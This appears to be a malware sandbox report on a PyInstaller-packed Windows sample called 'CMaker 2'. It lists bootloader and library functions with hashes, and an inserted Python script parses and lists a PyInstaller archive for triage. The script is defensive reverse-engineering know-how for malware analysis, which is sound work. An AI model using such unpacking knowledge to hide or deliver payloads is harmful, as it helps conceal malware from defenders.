• GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43CB
• GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43F3
• GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE441B
• GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4443
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 190572456-2007157414
                                                                                                                                                                                  • Opcode ID: 6a244b584105566801507efa4892542c2e2cca56cf1b8684858a7b7b26d5cccb
                                                                                                                                                                                  • Instruction ID: 2baaca0cd607ce0177c95d83cca8cf8e82db03c9bafb6c725dcb4c07420af4fa
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a244b584105566801507efa4892542c2e2cca56cf1b8684858a7b7b26d5cccb
                                                                                                                                                                                  • Instruction Fuzzy Hash: F7127DE4A1DB4390FB59CB44A8901B422B1BF4A745B94A1F6CA3ED23E0FF7DB558D240
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 190572456-573889970
• Opcode ID: e7ad631868096c1857f19de989c3ae72b1e7ed32f0438870ee7e79edbb589c26
• Instruction ID: 857f873d96ab79f8aab4f997b8a7b5ae86da6f12a4b5bc5144c537041845d8c6
• Opcode Fuzzy Hash: e7ad631868096c1857f19de989c3ae72b1e7ed32f0438870ee7e79edbb589c26
• Instruction Fuzzy Hash: 9AE16EE4A0DB4790FB56CB14B8A02B463B4BF19754B94A0F6C93ED23E5FF3CA5499201
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
• Associated: 00000005.00000002.2266316234.00007FFD9DFC0000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266399755.00007FFD9DFDA000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266399755.00007FFD9DFE2000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266691733.00007FFD9DFE3000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266751869.00007FFD9DFE5000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
Similarity
• API ID: 00007B2245630
• String ID: ABCMeta$GenericMeta$TypingMeta$_ProtocolMeta$__module__$__orig_bases__$__slots__$abc$mypyc classes can't have __slots__$mypyc classes can't have a metaclass$typing$typing_extensions
• API String ID: 1780217008-3015203947
• Opcode ID: 915c729ee343eac809401c4ef382881e9182cff1a9f5c6d4f48ea5a54d643442
• Instruction ID: 9295b3bfc05d866886a1433f7dd93d5108c0b35054168ed5f136fc92a31bbcf1
• Opcode Fuzzy Hash: 915c729ee343eac809401c4ef382881e9182cff1a9f5c6d4f48ea5a54d643442
• Instruction Fuzzy Hash: AEC12E25B08BC681EB65AFE9A96627823E0BF55B84F055335CECD07654FF3CE1A99300
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: ad333d4e6d983366683b0160822d6d3ede48283b4990ce3aeba120fa01df1e70
• Instruction ID: ef82866acc0961129276e843e047cd4436b42a969e2b07fc4e0ad0626a6dd085
• Opcode Fuzzy Hash: ad333d4e6d983366683b0160822d6d3ede48283b4990ce3aeba120fa01df1e70
• Instruction Fuzzy Hash: DC518FA1B0864392EB109B15E4801BA23A0FF56B94FD491F1EE2EC77D6FE7CE5548300
APIs
  • Part of subcall function 00007FF6FABE7800: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FABE31D4,00000000,00007FF6FABE1905), ref: 00007FF6FABE7839
• ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6FABE6EC7,?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE69FC
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 2001182103-930877121
• Opcode ID: 043a92a9ee9717b47d55a3c399030426f86f17bf1d4776fc1ffd4db9ab3bbf80
• Instruction ID: 8b25c6b12ee2d5cc3aba61eaff1e1de9e96f50184a8bad144f05e36eec7f1066
• Opcode Fuzzy Hash: 043a92a9ee9717b47d55a3c399030426f86f17bf1d4776fc1ffd4db9ab3bbf80
• Instruction Fuzzy Hash: 4641BA61B1C68341FB51DB25E8A12BA6361EF95780FC4A4F5E66EC36D6FE3CE5048700
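The two functions above from the 00007FF6FABE0000 image (the "Failed to extract %s: ..." block and the "LOADER: ... runtime-tmpdir" block), together with the GetProcAddress table of Py* imports further up, are the PyInstaller bootloader, which matches the "Found pyInstaller with non standard icon" signature in the overview. In practice that means the Python payload sits in a CArchive overlay appended to the PE, and triage starts by locating that overlay and listing its table of contents. The following is an added example written for this page, not code from the Joe Sandbox report, the analysed sample or PyInstaller itself; it follows the published CArchive layout (8-byte magic MEI\x0c\x0b\x0a\x0b\x0e inside an 88-byte big-endian cookie that closes the package, TOC headers packed as '!iIIIBc' followed by a NUL-padded name) and, when run without arguments, parses an archive it constructs in memory (SAMPLE_ENTRIES and SAMPLE_SCRIPT are made up for the demonstration).

```python
"""Locate and list a PyInstaller CArchive overlay (added triage example).

Not code from the sandbox report, the analysed sample or PyInstaller. Cookie and
TOC layout follow the public CArchive format. The default input is constructed
in memory; pass a file path to run the same parser over a real binary.
"""
import struct
import sys
import zlib
from dataclasses import dataclass

MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"                    # magic, pkg_len, toc_off, toc_len, pyver, pylibname
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)    # 88 bytes
TOC_HDR_FMT = "!iIIIBc"                      # entry_len, data_off, cdata_len, udata_len, cflag, typecode
TOC_HDR_SIZE = struct.calcsize(TOC_HDR_FMT)  # 18 bytes


@dataclass
class Entry:
    name: str
    typecode: str      # 's' script, 'z' PYZ archive, 'b' binary, 'x' data, 'm' module, ...
    data_off: int      # absolute file offset of the (possibly zlib-compressed) payload
    cdata_len: int
    udata_len: int
    compressed: bool


@dataclass
class Archive:
    pyver: int
    pylib: str
    start: int         # absolute file offset where the package begins
    entries: list

    @property
    def python_version(self):
        # PyInstaller encodes 3.12 as 312; older bootloaders encoded 3.9 as 39.
        return divmod(self.pyver, 100) if self.pyver >= 100 else divmod(self.pyver, 10)


def find_cookie(blob: bytes) -> int:
    """Offset of the cookie, or -1. Searched backwards because droppers sometimes
    append data after the archive, so the cookie is not always the last 88 bytes."""
    return blob.rfind(MAGIC)


def parse_archive(blob: bytes) -> Archive:
    cookie_off = find_cookie(blob)
    if cookie_off < 0:
        raise ValueError("no PyInstaller cookie found")
    _magic, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack_from(COOKIE_FMT, blob, cookie_off)
    start = cookie_off + COOKIE_SIZE - pkg_len   # pkg_len includes the cookie itself
    if start < 0:
        raise ValueError("package length exceeds file size")
    pos, end = start + toc_off, start + toc_off + toc_len
    entries = []
    while pos < end:
        entry_len, data_off, clen, ulen, cflag, typecode = struct.unpack_from(TOC_HDR_FMT, blob, pos)
        if entry_len < TOC_HDR_SIZE or pos + entry_len > end:
            raise ValueError(f"corrupt TOC entry at {pos:#x}")
        raw_name = blob[pos + TOC_HDR_SIZE:pos + entry_len].split(b"\0", 1)[0]
        entries.append(Entry(raw_name.decode("utf-8", "replace"), typecode.decode(),
                             start + data_off, clen, ulen, bool(cflag)))
        pos += entry_len
    return Archive(pyver, pylib.rstrip(b"\0").decode("ascii", "replace"), start, entries)


def extract(blob: bytes, e: Entry) -> bytes:
    """Return an entry's decompressed payload, checking the declared size."""
    data = blob[e.data_off:e.data_off + e.cdata_len]
    if e.compressed:
        data = zlib.decompress(data)
    if len(data) != e.udata_len:
        raise ValueError(f"{e.name}: size mismatch")
    return data


def entry_points(arc: Archive) -> list:
    """Scripts the bootloader runs, minus PyInstaller's own pyi_rth_* runtime hooks."""
    return [e.name for e in arc.entries if e.typecode == "s" and not e.name.startswith("pyi_rth_")]


def build_archive(entries, pyver=312, pylib=b"python312.dll") -> bytes:
    """Build a minimal CArchive for testing (constructed data, not a real sample)."""
    data, toc = bytearray(), bytearray()
    for name, typecode, payload, compress in entries:
        chunk = zlib.compress(payload) if compress else payload
        nm = name.encode()
        entry_len = TOC_HDR_SIZE + len(nm) + 1
        entry_len += (-entry_len) % 16           # PyInstaller pads TOC entries to 16 bytes
        toc += struct.pack(TOC_HDR_FMT, entry_len, len(data), len(chunk), len(payload),
                           int(compress), typecode.encode())
        toc += nm.ljust(entry_len - TOC_HDR_SIZE, b"\0")
        data += chunk
    pkg_len = len(data) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(data), len(toc), pyver, pylib)
    return bytes(data + toc + cookie)


# Constructed sample content for the stand-alone run and the tests (not from the sample).
SAMPLE_SCRIPT = b"import socket\nprint('packed entry script')\n"
SAMPLE_ENTRIES = [
    ("pyi_rth_inspect", "s", b"# runtime hook\n", True),
    ("main", "s", SAMPLE_SCRIPT, True),
    ("python312.dll", "b", b"MZ" + b"\0" * 62, False),
]

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_archive(SAMPLE_ENTRIES)
    arc = parse_archive(blob)
    print(f"python {arc.python_version[0]}.{arc.python_version[1]} ({arc.pylib}), "
          f"package at {arc.start:#x}, {len(arc.entries)} entries")
    for e in arc.entries:
        print(f"  {e.typecode} {e.name:40s} {e.udata_len:>9d} bytes{' zlib' if e.compressed else ''}")
    print("entry points:", entry_points(arc))
```

The cookie's pyver field is worth recording before anything else: the marshalled code objects inside the 'z' (PYZ) entries can only be loaded or decompiled with the interpreter version the bootloader was built for, which for this sample would be the version of the python*.dll the loader resolves via the GetProcAddress table above. The 's' entries that are not pyi_rth_* hooks are the scripts the bootloader actually executes and are usually the first thing to read; in real samples they are frequently a short stub that decodes and exec()s a further stage rather than the final payload.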
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007B2246570
• String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
• API String ID: 511975427-1099454403
• Opcode ID: 4fb00667328cc24e5a01ced80a969a7b37fcff98c645767f26b4f54dc518abc7
• Instruction ID: 5a654ca3f8eed03887530d3c4fa6d02be611f6bc94348ec42a804765bbc03f35
• Opcode Fuzzy Hash: 4fb00667328cc24e5a01ced80a969a7b37fcff98c645767f26b4f54dc518abc7
• Instruction Fuzzy Hash: FA41B372B18A029AF7758B91E87437837B8EB48784F554835EA1ED7A90DF6CE650CB00
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007F294
• String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
• API String ID: 1145900664-1794268454
• Opcode ID: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
• Instruction ID: 44c84f117b8ed25d14ebe2cf534175bfc3eeb5a373b833b904fef501018f1b6a
• Opcode Fuzzy Hash: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
• Instruction Fuzzy Hash: ABA17226B0AB8291FBA6DFA5D4607B833A8FF88B48F184235DE5C57355DF28E191C310
APIs
Memory Dump Source
• Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 349153199-0
• Opcode ID: 4054133e40b1959e30dc0a75aba67dbbe5993da8583830be354a929f77bfd96a
• Instruction ID: 3cc8bd89e1ca772ccaa618616e80aeb3e2531fe8cc94a6ab8745c7a193138063
• Opcode Fuzzy Hash: 4054133e40b1959e30dc0a75aba67dbbe5993da8583830be354a929f77bfd96a
• Instruction Fuzzy Hash: E7817D21F0C6C34AF670AFE598632B966D0AFC5780F444335DA8D47796FE3CE9498610
APIs
Memory Dump Source
• Source File: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 349153199-0
• Opcode ID: 30e28fcbfb3a46fa9e67cb2bb80d6c3e20035b30d14687dd822705d8e6ad13c0
• Instruction ID: 1a23e43db4e875d8136ff0fb683a6552f7f4a7ffb4f27948d2d5567bc9041111
• Opcode Fuzzy Hash: 30e28fcbfb3a46fa9e67cb2bb80d6c3e20035b30d14687dd822705d8e6ad13c0
• Instruction Fuzzy Hash: 78819D21F082C38AFA74AFE5A46327962D0AF85784F044335DACD87796FF3CE9498250
APIs
Memory Dump Source
• Source File: 00000005.00000002.2263462576.00007FFD93481000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd93480000_CMaker 2.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 349153199-0
• Opcode ID: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
• Instruction ID: 6792af44f85ec22bbabd7288ea5bd8e6bca8db6ff9cf361de9803670e96bcdb7
• Opcode Fuzzy Hash: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
• Instruction Fuzzy Hash: 6781C321F0C24387FA70ABE694712BA66E8AF49780F568535DD4CF7796DE3CE8468700
APIs
Memory Dump Source
• Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 349153199-0
• Opcode ID: 8bc07dac1d2a15841653c24e65cbf90d53687740eca8f36c6e0f4d9ec23f2963
• Instruction ID: 04abf19c049407d04d21f3e8e74203ddb7d1882879f81cd7b73d1b38ff3ba440
• Opcode Fuzzy Hash: 8bc07dac1d2a15841653c24e65cbf90d53687740eca8f36c6e0f4d9ec23f2963
• Instruction Fuzzy Hash: 29818B20F0864386FA76BBE7A8752796390AF85782F04473DDD0D8F396DE3CE9528200
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: 4cf7e6b867a9921ad7ec7aa07c9b27dd84d4bc01ad74cf8c657fddc9a570da3b
• Instruction ID: 58299c967cc52368a5bca97e44246e660f45fb03daf624c6653088e5be0ea759
• Opcode Fuzzy Hash: 4cf7e6b867a9921ad7ec7aa07c9b27dd84d4bc01ad74cf8c657fddc9a570da3b
• Instruction Fuzzy Hash: FC12C469E0C2C346FB205B94E1242B9B699FB52750FCC417DDEA9866C4FF3DE9809B10
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: 2761c62bb11862c53203c4a1c44b9eb9fed40e0afa0247b40f2c3f0b102f2d4b
• Instruction ID: 5cd1ede6f597023a0ed36f1a76f0d20770555450b2b4e465ef96749780edff71
• Opcode Fuzzy Hash: 2761c62bb11862c53203c4a1c44b9eb9fed40e0afa0247b40f2c3f0b102f2d4b
• Instruction Fuzzy Hash: 62129632F0D18386FB245A34E0946B976A2FB42755FD841F5D6A9866C4FF3DE890CB20
APIs
• GetTempPathW.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F14
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F1A
                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F5C
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7040: GetEnvironmentVariableW.KERNEL32(00007FF6FABE29B0), ref: 00007FF6FABE7077
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7040: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6FABE7099
                                                                                                                                                                                    • Part of subcall function 00007FF6FABF7DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FABF7E05
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Environment$CreateCurrentDirectoryExpandPathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                  • API String ID: 365913792-1339014028
                                                                                                                                                                                  • Opcode ID: 5bd611a46aa108d535a11aa0f72055f948f25ea8d232a5976be4a42b3ba8e0a9
                                                                                                                                                                                  • Instruction ID: f19d115e45f4e5482a0ed08d85c25666350580bbace33afe6a2ee5453af97d60
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bd611a46aa108d535a11aa0f72055f948f25ea8d232a5976be4a42b3ba8e0a9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D41C465B1964241FB21EB65E8A02B96261AF877C0FC450F5EE2DC77D6FE3CE5418340
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                  • API String ID: 2050909247-3659356012
                                                                                                                                                                                  • Opcode ID: 9a877eb4e44f1ed687fc1ce12ddea256fc485ba92bf56b3aff1795f8d89bdef8
                                                                                                                                                                                  • Instruction ID: 97f6ae28e7adeab17516ac88c1200cb8353f964b36fc9da8c4194eafbeccf629
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a877eb4e44f1ed687fc1ce12ddea256fc485ba92bf56b3aff1795f8d89bdef8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 72419361B0864242EB24DB16B8806BAA7A1FF56BC4FD490B1DD6EC77D6FE3CE0459301
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
